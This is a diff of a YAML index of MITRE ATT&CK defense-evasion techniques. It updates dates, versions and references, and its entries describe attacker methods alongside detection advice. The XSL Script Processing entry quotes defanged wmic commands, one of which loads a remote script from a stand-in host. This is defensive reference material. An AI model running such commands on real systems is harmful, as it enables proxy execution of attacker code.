         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12876,7 +13187,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12926,7 +13236,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -12981,12 +13290,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13036,12 +13344,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13101,8 +13408,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13119,37 +13426,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13157,6 +13445,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13164,7 +13454,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13194,7 +13484,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13240,7 +13529,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13285,8 +13574,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13331,7 +13618,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13345,58 +13632,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13413,6 +13670,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13427,21 +13687,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13486,9 +13777,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13545,8 +13835,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13555,57 +13845,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13623,29 +13867,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13678,7 +13966,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13706,48 +13994,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13756,6 +14007,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13764,20 +14018,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13834,6 +14119,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
